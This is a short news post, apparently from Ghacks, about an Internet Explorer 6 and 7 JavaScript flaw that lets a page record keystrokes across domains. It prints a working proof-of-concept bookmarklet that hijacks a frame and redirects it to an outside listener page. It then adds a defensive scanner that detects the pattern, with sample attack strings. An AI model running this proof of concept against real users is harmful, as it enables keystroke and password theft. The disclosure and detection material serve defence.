Ghacks has found a critical JavaScript vulnerability that affects Internet Explorer 6 and 7 and can be used to record a user's keystrokes even after he switches domains. That means a specially prepared website can launch JavaScript that records everything the user does afterwards, including text input, which naturally means usernames and passwords as well.
The following JavaScript code, when clicked, opens a new window (hackademix.net), hijacks one of its iframes, and captures keystrokes.
javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);
There is no fix for this vulnerability at the moment. If you're using IE 6 or IE 7, all you can do is disable JavaScript or allow it only on trusted domains. An explanation from the same researcher is available.
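A content filter or code review script can flag the construct the proof of concept above relies on: an object with a toString method assigned to a frame's location. The scanner below is an added example, not code from Ghacks or the researcher; its function names, finding labels and sample inputs (which use reserved example domains) are constructed for illustration.

```javascript
// Added example: heuristic scanner for the location-object pattern.
// All names and sample inputs are constructed for illustration.

function normalizeScript(input) {
  // Drop the javascript: scheme and undo percent-encoding (e.g. %20) so the
  // patterns see the script text the browser would execute.
  let s = input.trim().replace(/^javascript:/i, '');
  try { s = decodeURIComponent(s); } catch (e) { /* malformed escape: scan as-is */ }
  return s;
}

// <expr>.location = { ... toString: function ...   (also .location.href)
const LOCATION_OBJECT = /\.location(?:\.href)?\s*=\s*\{[^}]*?\btoString\b['"]?\s*:\s*function\b/;
// A frame reached through a window handle: w.frames[0], w.frames.name
const FRAME_ACCESS = /\.frames\s*(?:\[|\.)/;
const TIMER = /\bset(?:Interval|Timeout)\s*\(/;

function scanScript(input) {
  const script = normalizeScript(input);
  const findings = [];
  if (!LOCATION_OBJECT.test(script)) return findings;
  findings.push('object-with-toString-assigned-to-location');
  if (FRAME_ACCESS.test(script)) findings.push('target-is-frame-of-window-handle');
  if (TIMER.test(script)) findings.push('assignment-retried-on-timer');
  return findings;
}

// Constructed samples (reserved example domains).
const SAMPLES = {
  pocShape: "javascript:w=open('http://site.example/');setInterval(function(){try{" +
    "w.frames[0].location={toString:function(){return%20'http://listener.example/';}}" +
    "}catch(e){}},5000);void(0);",
  quotedKey: "top.frames['ad'].location = { 'toString': function () { return u; } };",
  plainNavigation: "w.frames[0].location = 'http://site.example/next.html';",
  frameBuster: "if (top.location != self.location) { top.location = self.location.href; }",
  badEscape: "javascript:document.title='100%';"
};

for (const [name, src] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(scanScript(src)));
}
```

This matches the literal pattern only; script that builds the object indirectly will not match, so it complements the JavaScript restrictions described above instead of replacing them.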
Source: Ghacks


About the Author: DG